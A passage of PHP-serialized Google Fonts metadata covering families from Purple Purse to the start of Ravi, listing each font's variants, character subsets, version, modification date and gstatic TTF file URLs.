Purse\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/purplepurse/v21/qWctB66gv53iAp-Vfs4My6qyeBb_ujA4ug.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1115;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Qahiri\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:67:\"http://fonts.gstatic.com/s/qahiri/v7/tsssAp1RZy0C_hGuU3Chrnmupw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1116;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Quando\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/quando/v14/xMQVuFNaVa6YuW0pC6WzKX_QmA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1117;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Quantico\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/quantico/v15/rax-HiSdp9cPL3KIF4xsLjxSmlLZ.ttf\";s:6:\"italic\";s:75:\"http://fonts.gstatic.com/s/quantico/v15/rax4HiSdp9cPL3KIF7xuJDhwn0LZ6T8.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/quantico/v15/rax5HiSdp9cPL3KIF7TQARhasU7Q8Cad.ttf\";s:9:\"700italic\";s:79:\"http://fonts.gstatic.com/s/quantico/v15/rax7HiSdp9cPL3KIF7xuHIRfu0ry9TadML4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1118;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Quattrocento\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/quattrocento/v17/OZpEg_xvsDZQL_LKIF7q4jPHxGL7f4jFuA.ttf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/quattrocento/v17/OZpbg_xvsDZQL_LKIF7q4jP_eE3fd6PZsXcM9w.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1119;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Quattrocento Sans\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:92:\"http://fonts.gstatic.com/s/quattrocentosans/v18/va9c4lja2NVIDdIAAoMR5MfuElaRB3zOvU7eHGHJ.ttf\";s:6:\"italic\";s:95:\"http://fonts.gstatic.com/s/quattrocentosans/v18/va9a4lja2NVIDdIAAoMR5MfuElaRB0zMt0r8GXHJkLI.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/quattrocentosans/v18/va9Z4lja2NVIDdIAAoMR5MfuElaRB0RykmrWN33AiasJ.ttf\";s:9:\"700italic\";s:99:\"http://fonts.gstatic.com/s/quattrocentosans/v18/va9X4lja2NVIDdIAAoMR5MfuElaRB0zMj_bTPXnijLsJV7E.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1120;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Questrial\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/questrial/v18/QdVUSTchPBm7nuUeVf7EuStkm20oJA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1121;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Quicksand\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v30\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:92:\"http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkKEo18G0wx40QDw.ttf\";s:7:\"regular\";s:92:\"http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkP8o18G0wx40QDw.ttf\";s:3:\"500\";s:92:\"http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkM0o18G0wx40QDw.ttf\";s:3:\"600\";s:92:\"http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkCEv18G0wx40QDw.ttf\";s:3:\"700\";s:92:\"http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkBgv18G0wx40QDw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1122;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Quintessential\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:86:\"http://fonts.gstatic.com/s/quintessential/v20/fdNn9sOGq31Yjnh3qWU14DdtjY5wS7kmAyxM.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1123;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Qwigley\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/qwigley/v16/1cXzaU3UGJb5tGoCuVxsi1mBmcE.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1124;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Qwitcher Grypen\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/qwitchergrypen/v3/pxicypclp9tDilN9RrC5BSI1dZmrSGNAom-wpw.ttf\";s:3:\"700\";s:91:\"http://fonts.gstatic.com/s/qwitchergrypen/v3/pxiZypclp9tDilN9RrC5BSI1dZmT9ExkqkSsrvNXiA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1125;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Racing Sans One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/racingsansone/v13/sykr-yRtm7EvTrXNxkv5jfKKyDCwL3rmWpIBtA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1126;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Radio Canada\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:9:\"300italic\";i:6;s:6:\"italic\";i:7;s:9:\"500italic\";i:8;s:9:\"600italic\";i:9;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":10:{s:3:\"300\";s:115:\"http://fonts.gstatic.com/s/radiocanada/v16/XRX13ISXn0dBMcibU6jlAqr3ejLv5OLZYiYXik6db2P4jxxlsls-0nESkQPIJOdSSfOT.ttf\";s:7:\"regular\";s:115:\"http://fonts.gstatic.com/s/radiocanada/v16/XRX13ISXn0dBMcibU6jlAqr3ejLv5OLZYiYXik6db2P4jxxlsls-0nFMkQPIJOdSSfOT.ttf\";s:3:\"500\";s:115:\"http://fonts.gstatic.com/s/radiocanada/v16/XRX13ISXn0dBMcibU6jlAqr3ejLv5OLZYiYXik6db2P4jxxlsls-0nF-kQPIJOdSSfOT.ttf\";s:3:\"600\";s:115:\"http://fonts.gstatic.com/s/radiocanada/v16/XRX13ISXn0dBMcibU6jlAqr3ejLv5OLZYiYXik6db2P4jxxlsls-0nGSlgPIJOdSSfOT.ttf\";s:3:\"700\";s:115:\"http://fonts.gstatic.com/s/radiocanada/v16/XRX13ISXn0dBMcibU6jlAqr3ejLv5OLZYiYXik6db2P4jxxlsls-0nGrlgPIJOdSSfOT.ttf\";s:9:\"300italic\";s:118:\"http://fonts.gstatic.com/s/radiocanada/v16/XRX33ISXn0dBMcibU6jlAqrdcwAMBJuK9IgQn4bfnSrKcMQM2cGQ1WSE0rWLLuNwTOOTa9k.ttf\";s:6:\"italic\";s:118:\"http://fonts.gstatic.com/s/radiocanada/v16/XRX33ISXn0dBMcibU6jlAqrdcwAMBJuK9IgQn4bfnSrKcMQM2cGQ1WSE0uuLLuNwTOOTa9k.ttf\";s:9:\"500italic\";s:118:\"http://fonts.gstatic.com/s/radiocanada/v16/XRX33ISXn0dBMcibU6jlAqrdcwAMBJuK9IgQn4bfnSrKcMQM2cGQ1WSE0tmLLuNwTOOTa9k.ttf\";s:9:\"600italic\";s:118:\"http://fonts.gstatic.com/s/radiocanada/v16/XRX33ISXn0dBMcibU6jlAqrdcwAMBJuK9IgQn4bfnSrKcMQM2cGQ1WSE0jWMLuNwTOOTa9k.ttf\";s:9:\"700italic\";s:118:\"http://fonts.gstatic.com/s/radiocanada/v16/XRX33ISXn0dBMcibU6jlAqrdcwAMBJuK9IgQn4bfnSrKcMQM2cGQ1WSE0gyMLuNwTOOTa9k.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1127;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Radley\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/radley/v20/LYjDdGzinEIjCN19oAlEpVs3VQ.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/radley/v20/LYjBdGzinEIjCN1NogNAh14nVcfe.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1128;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Rajdhani\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:76:\"http://fonts.gstatic.com/s/rajdhani/v15/LDI2apCSOBg7S-QT7pasEcOsc-bGkqIw.ttf\";s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/rajdhani/v15/LDIxapCSOBg7S-QT7q4AOeekWPrP.ttf\";s:3:\"500\";s:76:\"http://fonts.gstatic.com/s/rajdhani/v15/LDI2apCSOBg7S-QT7pb0EMOsc-bGkqIw.ttf\";s:3:\"600\";s:76:\"http://fonts.gstatic.com/s/rajdhani/v15/LDI2apCSOBg7S-QT7pbYF8Osc-bGkqIw.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/rajdhani/v15/LDI2apCSOBg7S-QT7pa8FsOsc-bGkqIw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1129;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Rakkas\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/rakkas/v17/Qw3cZQlNHiblL3j_lttPOeMcCw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1130;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Raleway\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v28\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:87:\"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvao4CPNLA3JC9c.ttf\";s:3:\"200\";s:87:\"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVtaooCPNLA3JC9c.ttf\";s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVuEooCPNLA3JC9c.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaooCPNLA3JC9c.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvoooCPNLA3JC9c.ttf\";s:3:\"600\";s:87:\"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVsEpYCPNLA3JC9c.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVs9pYCPNLA3JC9c.ttf\";s:3:\"800\";s:87:\"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVtapYCPNLA3JC9c.ttf\";s:3:\"900\";s:87:\"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVtzpYCPNLA3JC9c.ttf\";s:9:\"100italic\";s:90:\"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4WjNPrQVIT9c2c8.ttf\";s:9:\"200italic\";s:90:\"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4ejMPrQVIT9c2c8.ttf\";s:9:\"300italic\";s:90:\"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4TbMPrQVIT9c2c8.ttf\";s:6:\"italic\";s:90:\"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4WjMPrQVIT9c2c8.ttf\";s:9:\"500italic\";s:90:\"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4VrMPrQVIT9c2c8.ttf\";s:9:\"600italic\";s:90:\"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4bbLPrQVIT9c2c8.ttf\";s:9:\"700italic\";s:90:\"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4Y_LPrQVIT9c2c8.ttf\";s:9:\"800italic\";s:90:\"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4ejLPrQVIT9c2c8.ttf\";s:9:\"900italic\";s:90:\"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4cHLPrQVIT9c2c8.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1131;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Raleway Dots\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/ralewaydots/v14/6NUR8FifJg6AfQvzpshgwJ8kyf9Fdty2ew.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1132;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Ramabhadra\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/ramabhadra/v15/EYq2maBOwqRW9P1SQ83LehNGX5uWw3o.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1133;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Ramaraja\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/ramaraja/v15/SlGTmQearpYAYG1CABIkqnB6aSQU.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1134;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Rambla\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/rambla/v13/snfrs0ip98hx6mr0I7IONthkwQ.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/rambla/v13/snfps0ip98hx6mrEIbgKFN10wYKa.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/rambla/v13/snfos0ip98hx6mrMn50qPvN4yJuDYQ.ttf\";s:9:\"700italic\";s:74:\"http://fonts.gstatic.com/s/rambla/v13/snfus0ip98hx6mrEIYC2O_l86p6TYS-Y.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1135;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Rammetto One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/rammettoone/v14/LhWiMV3HOfMbMetJG3lQDpp9Mvuciu-_SQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1136;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Rampart One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/rampartone/v7/K2F1fZFGl_JSR1tAWNG9R6qgLS76ZHOM.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1137;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Ranchers\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/ranchers/v13/zrfm0H3Lx-P2Xvs2AoDYDC79XTHv.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1138;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Rancho\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/rancho/v17/46kulbzmXjLaqZRlbWXgd0RY1g.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1139;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Ranga\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/ranga/v17/C8ct4cYisGb28p6CLDwZwmGE.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/ranga/v17/C8cg4cYisGb28qY-AxgR6X2NZAn2.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1140;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Rasa\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:9:\"300italic\";i:6;s:6:\"italic\";i:7;s:9:\"500italic\";i:8;s:9:\"600italic\";i:9;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"gujarati\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":10:{s:3:\"300\";s:80:\"http://fonts.gstatic.com/s/rasa/v15/xn76YHIn1mWmVKl8ZtAM9NrJfN4YJW41fcvN2KT4.ttf\";s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/rasa/v15/xn76YHIn1mWmVKl8ZtAM9NrJfN5GJW41fcvN2KT4.ttf\";s:3:\"500\";s:80:\"http://fonts.gstatic.com/s/rasa/v15/xn76YHIn1mWmVKl8ZtAM9NrJfN50JW41fcvN2KT4.ttf\";s:3:\"600\";s:80:\"http://fonts.gstatic.com/s/rasa/v15/xn76YHIn1mWmVKl8ZtAM9NrJfN6YIm41fcvN2KT4.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/rasa/v15/xn76YHIn1mWmVKl8ZtAM9NrJfN6hIm41fcvN2KT4.ttf\";s:9:\"300italic\";s:83:\"http://fonts.gstatic.com/s/rasa/v15/xn78YHIn1mWmfqBOmQhln0Bne8uOZth2d8_v3bT4Ycc.ttf\";s:6:\"italic\";s:83:\"http://fonts.gstatic.com/s/rasa/v15/xn78YHIn1mWmfqBOmQhln0Bne8uOZoZ2d8_v3bT4Ycc.ttf\";s:9:\"500italic\";s:83:\"http://fonts.gstatic.com/s/rasa/v15/xn78YHIn1mWmfqBOmQhln0Bne8uOZrR2d8_v3bT4Ycc.ttf\";s:9:\"600italic\";s:83:\"http://fonts.gstatic.com/s/rasa/v15/xn78YHIn1mWmfqBOmQhln0Bne8uOZlhxd8_v3bT4Ycc.ttf\";s:9:\"700italic\";s:83:\"http://fonts.gstatic.com/s/rasa/v15/xn78YHIn1mWmfqBOmQhln0Bne8uOZmFxd8_v3bT4Ycc.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1141;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Rationale\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/rationale/v24/9XUnlJ92n0_JFxHIfHcsdlFMzLC2Zw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1142;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Ravi 